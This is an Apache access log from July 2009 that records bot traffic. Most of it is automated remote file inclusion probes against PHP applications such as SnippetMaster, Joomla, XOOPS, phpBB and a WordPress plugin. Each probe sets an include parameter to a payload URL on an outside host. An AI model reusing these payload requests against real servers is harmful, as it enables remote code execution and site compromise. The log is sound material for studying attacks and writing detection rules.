89.188.129.126 - - [10/Jul/2009:02:08:37 -0400] "GET /logs/access_log.Q109053000%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
89.188.129.126 - - [10/Jul/2009:02:09:01 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
89.188.129.126 - - [10/Jul/2009:02:09:15 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
89.188.129.126 - - [10/Jul/2009:02:09:15 -0400] "GET /logs/access_log.Q109062500//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
89.188.129.126 - - [10/Jul/2009:02:09:15 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Jul/2009:02:09:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.188.129.126 - - [10/Jul/2009:02:09:55 -0400] "GET /logs/access_log.Q109060800//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
217.65.100.23 - - [10/Jul/2009:02:10:06 -0400] "GET /logs/access_log.Q109053000%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://mmemba.org/mambots/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
83.13.191.186 - - [10/Jul/2009:02:10:10 -0400] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:10 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:10 -0400] "GET /logs/access_log.Q109060200/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:12 -0400] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:12 -0400] "GET /logs/access_log.Q109060200/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:12 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:20 -0400] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:20 -0400] "GET /logs/access_log.Q109060200%20%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:20 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:21 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:21 -0400] "GET /logs/access_log.Q109060200%20%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:21 -0400] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:30 -0400] "GET /logs/error_log.Q109062000%20%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:10:34 -0400] "GET /logs/error_log.Q109062000%20%20/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:11:55 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:11:55 -0400] "GET /logs/access_log.Q109060200/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:11:55 -0400] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:12:06 -0400] "GET /logs/error_log.Q109062000/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
91.121.5.55 - - [10/Jul/2009:02:12:48 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.5.55 - - [10/Jul/2009:02:12:48 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:13:34 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:13:34 -0400] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:13:34 -0400] "GET /logs/access_log.Q109060200/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:13:43 -0400] "GET /logs/error_log.Q109062000/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:14:05 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:14:05 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:14:05 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:14:13 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.249.68.70 - - [10/Jul/2009:02:14:25 -0400] "GET /images/items/2001108_thumb.jpg HTTP/1.1" 200 2510 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [10/Jul/2009:02:14:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.236.242.164 - - [10/Jul/2009:02:15:32 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:15:33 -0400] "GET /logs/access_log.Q109062000/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:17:43 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:17:43 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:17:43 -0400] "GET /logs/access_log.Q109061600//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:17:47 -0400] "GET /logs/access_log.Q109053100//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:17:50 -0400] "GET /logs/access_log.Q109051800%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:17:50 -0400] "GET /logs/access_log.Q109061600%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:17:59 -0400] "GET /logs/index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:18:00 -0400] "GET /logs/access_log.Q109062700/index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:18:00 -0400] "GET /index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:18:00 -0400] "GET /logs/access_log.Q109062700%20%20/index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:18:00 -0400] "GET /index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:18:00 -0400] "GET /logs/index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:18:00 -0400] "GET /logs/index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:18:00 -0400] "GET /index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:18:00 -0400] "GET /logs/access_log.Q109062700/index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:02:19:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.22.140.17 - - [10/Jul/2009:02:21:27 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:21:27 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:21:27 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.68.247 - - [10/Jul/2009:02:21:44 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L004C54341001410026B0031+WSEQ(S0060):1+OUITEM(A0200):05560000 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.207.160.102 - - [10/Jul/2009:02:23:22 -0400] "GET /logs/error_log.Q109051800%20%20//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.207.160.102 - - [10/Jul/2009:02:23:22 -0400] "GET //?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.207.160.102 - - [10/Jul/2009:02:23:22 -0400] "GET /logs//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 200 8927 "-" "Mozilla/5.0"
195.207.160.102 - - [10/Jul/2009:02:23:27 -0400] "GET /logs/error_log.Q109053100%20%20//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.2.151.107 - - [10/Jul/2009:02:23:36 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.2.151.107 - - [10/Jul/2009:02:23:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.2.151.107 - - [10/Jul/2009:02:23:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.2.151.107 - - [10/Jul/2009:02:23:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
209.59.12.99 - - [10/Jul/2009:02:24:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [10/Jul/2009:02:26:49 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:27:39 -0400] "GET /logs/access_log.Q109051600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.246.20.221 - - [10/Jul/2009:02:27:46 -0400] "GET /logs/error_log.Q109070200%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
218.246.20.221 - - [10/Jul/2009:02:27:46 -0400] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.246.20.221 - - [10/Jul/2009:02:27:48 -0400] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:27:56 -0400] "GET /logs/access_log.Q109062300/index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:27:56 -0400] "GET /index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:27:56 -0400] "GET /logs/index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.207.160.102 - - [10/Jul/2009:02:28:13 -0400] "GET //?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
195.207.160.102 - - [10/Jul/2009:02:28:13 -0400] "GET /logs/error_log.Q109051800%20%20//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.207.160.102 - - [10/Jul/2009:02:28:13 -0400] "GET /logs//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 200 8927 "-" "Mozilla/5.0"
195.207.160.102 - - [10/Jul/2009:02:28:13 -0400] "GET /logs/error_log.Q109053100%20%20//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
114.200.199.144 - - [10/Jul/2009:02:28:31 -0400] "GET /logs/access_log.Q109062300%20%20/index.php?meio.php=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.246.20.221 - - [10/Jul/2009:02:28:53 -0400] "GET /logs/error_log.Q109070400%20%20//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:28:54 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:28:54 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:28:57 -0400] "GET //skin/zero_vote/error.php?dir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
217.147.29.190 - - [10/Jul/2009:02:29:00 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.227.193.198 - - [10/Jul/2009:02:29:30 -0400] "GET //?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
58.227.193.198 - - [10/Jul/2009:02:29:30 -0400] "GET /logs/access_log.Q109060800%20%20//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.227.193.198 - - [10/Jul/2009:02:29:30 -0400] "GET /logs//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 200 8927 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:02:29:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [10/Jul/2009:02:29:47 -0400] "GET /logs/error_log.Q109070200//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
58.227.193.198 - - [10/Jul/2009:02:29:51 -0400] "GET /logs/error_log.Q109051900%20%20//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.246.20.221 - - [10/Jul/2009:02:30:16 -0400] "GET /logs/error_log.Q109070400//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:31:03 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:31:03 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:31:03 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:31:18 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:02:31:42 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:02:31:42 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:02:31:42 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:32:09 -0400] "GET /logs/access_log.Q109062500%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:32:54 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:32:54 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:32:54 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:32:54 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:32:54 -0400] "GET /logs/access_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:32:54 -0400] "GET /logs/access_log.Q109061900%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:34:09 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:34:09 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:02:34:10 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:34:11 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:34:11 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:34:17 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:34:18 -0400] "GET /logs/access_log.Q109070100%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:02:34:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
59.22.140.17 - - [10/Jul/2009:02:34:41 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:02:35:04 -0400] "GET /logs/access_log.Q109052400%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:35:35 -0400] "GET /logs/access_log.Q109062500%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:36:23 -0400] "GET /logs/access_log.Q109052400//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
75.126.128.202 - - [10/Jul/2009:02:36:42 -0400] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
75.126.128.202 - - [10/Jul/2009:02:36:42 -0400] "GET /logs/access_log.Q109051700///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
75.126.128.202 - - [10/Jul/2009:02:36:42 -0400] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
75.126.128.202 - - [10/Jul/2009:02:37:02 -0400] "GET /logs/access_log.Q109051400///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:02 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
